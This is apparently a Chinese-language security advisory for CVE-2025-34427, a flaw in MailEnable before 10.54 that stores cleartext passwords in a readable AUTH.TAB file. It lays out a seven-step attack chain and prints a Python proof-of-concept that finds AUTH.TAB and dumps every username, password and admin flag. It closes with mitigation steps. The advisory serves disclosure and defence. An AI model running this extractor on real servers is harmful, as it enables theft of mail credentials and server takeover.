CVE-2025-34427 MailEnable AUTH.TAB明文存储凭证漏洞

漏洞信息

漏洞编号

CVE-2025-34427

漏洞类型

明文存储凭证

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MailEnable

漏洞概述

MailEnable是一款广泛使用的Windows邮件服务器软件，支持SMTP、POP3、IMAP4和Webmail等服务。该漏洞存在于MailEnable 10.54之前的所有版本中，由于产品将用户和管理员密码以明文形式存储在AUTH.TAB文件中，且该文件的文件系统权限设置过于宽松，导致存在严重的安全隐患。攻击者可以通过本地低权限账户读取AUTH.TAB文件，获取所有用户的明文密码，包括普通用户和超级管理员的凭证。这些凭证可用于认证到MailEnable的各种服务（如POP3、SMTP、Webmail），从而实现未授权的邮箱访问和完全的服务器管理控制。该漏洞的CVSS评分达到7.8，属于高危漏洞，对企业邮件系统的机密性、完整性和可用性都造成严重影响。

技术细节

MailEnable邮件服务器在用户认证机制中存在设计缺陷。系统将用户凭证（用户名和密码）以明文形式存储在名为AUTH.TAB的配置文件中，该文件通常位于MailEnable的安装目录下的配置文件夹中。问题在于：1) 密码以明文而非哈希形式存储；2) AUTH.TAB文件的访问权限设置不当，允许低权限用户读取；3) 文件中不仅包含普通用户凭证，还包含管理员和超级管理员的凭证。攻击者利用此漏洞的步骤：首先获取MailEnable服务器的本地访问权限（即使是低权限账户）；然后定位并读取AUTH.TAB文件；接着解析文件内容提取用户名和明文密码；最后使用获取的凭证通过正常的服务协议（POP3/SMTP/IMAP/Webmail）进行认证，实现横向移动和权限提升。攻击成功后，攻击者可以访问任意用户的邮箱、发送钓鱼邮件、窃取敏感通信内容，甚至完全控制邮件服务器。

攻击链分析

STEP 1

1

获取MailEnable服务器的本地访问权限：攻击者通过其他漏洞、社会工程或合法访问获得服务器的低权限用户账户

STEP 2

2

定位AUTH.TAB文件：在MailEnable安装目录的Config文件夹中查找AUTH.TAB配置文件

STEP 3

3

读取敏感文件：由于AUTH.TAB文件权限配置不当，低权限用户可以成功读取该文件内容

STEP 4

4

解析凭证数据：提取AUTH.TAB中所有用户的管理用户名、明文密码、域名和权限标志

STEP 5

5

识别高价值目标：特别关注管理员账户（flags包含A或SA）和超级管理员账户

STEP 6

6

服务认证：使用获取的凭证通过POP3（110端口）、SMTP（25端口）、IMAP（143端口）或Webmail接口进行认证

STEP 7

7

横向移动与权限提升：成功登录后访问任意用户邮箱、发送钓鱼邮件、窃取敏感信息或获取完全的管理控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-34427 PoC - MailEnable AUTH.TAB Cleartext Credentials
Note: This PoC is for educational and authorized testing purposes only.
"""

import os
import sys
import re

def read_auth_tab(file_path):
    """
    Read and parse MailEnable AUTH.TAB file
    AUTH.TAB format typically contains entries like:
    USERNAME:PASSWORD:DOMAIN:FLAGS
    """
    credentials = []
    try:
        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
            for line in f:
                line = line.strip()
                if not line or line.startswith('#'):
                    continue
                parts = line.split(':')
                if len(parts) >= 2:
                    username = parts[0]
                    password = parts[1]
                    domain = parts[2] if len(parts) > 2 else 'N/A'
                    flags = parts[3] if len(parts) > 3 else 'N/A'
                    credentials.append({
                        'username': username,
                        'password': password,
                        'domain': domain,
                        'flags': flags
                    })
    except FileNotFoundError:
        print(f'[-] AUTH.TAB file not found: {file_path}')
    except PermissionError:
        print(f'[-] Permission denied reading: {file_path}')
    except Exception as e:
        print(f'[-] Error reading file: {e}')
    return credentials

def find_auth_tab_paths():
    """Common MailEnable installation paths for AUTH.TAB"""
    common_paths = [
        r'C:\Program Files\MailEnable\Config\AUTH.TAB',
        r'C:\Program Files (x86)\MailEnable\Config\AUTH.TAB',
        r'C:\MailEnable\Config\AUTH.TAB',
        r'C:\Program Files\Mail Enable\Config\AUTH.TAB',
    ]
    return [p for p in common_paths if os.path.exists(p)]

def main():
    print('[+] CVE-2025-34427 - MailEnable AUTH.TAB Credentials Extractor')
    print('[+] Target: MailEnable < 10.54\n')
    
    # Try to find AUTH.TAB in common locations
    auth_tab_paths = find_auth_tab_paths()
    
    if not auth_tab_paths:
        print('[-] AUTH.TAB file not found in common locations')
        print('[-] Please provide the full path manually')
        return
    
    all_credentials = []
    for path in auth_tab_paths:
        print(f'[+] Found AUTH.TAB: {path}')
        creds = read_auth_tab(path)
        all_credentials.extend(creds)
        
        if creds:
            print(f'[+] Extracted {len(creds)} credential entries:\n')
            for cred in creds:
                print(f"  User: {cred['username']}@{cred['domain']}")
                print(f"  Pass: {cred['password']}")
                print(f"  Flags: {cred['flags']}\n")
    
    if all_credentials:
        print(f'[+] Total: {len(all_credentials)} credentials extracted')
        
        # Check for admin accounts
        admins = [c for c in all_credentials if 'admin' in c['username'].lower() or c['flags'] in ['A', 'SA']]
        if admins:
            print(f'[!] WARNING: Found {len(admins)} admin/superadmin accounts!')

if __name__ == '__main__':
    main()

影响范围

MailEnable < 10.54

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 立即修改所有MailEnable用户密码，特别是管理员账户；2) 限制AUTH.TAB文件的访问权限，只允许SYSTEM和服务账户读取；3) 审查服务器访问日志，查找异常的文件读取行为；4) 加强服务器边界安全，防止未授权访问；5) 监控POP3、SMTP、Webmail服务的异常登录行为。但这些措施不能完全消除风险，最根本的解决方案仍是升级到修复版本。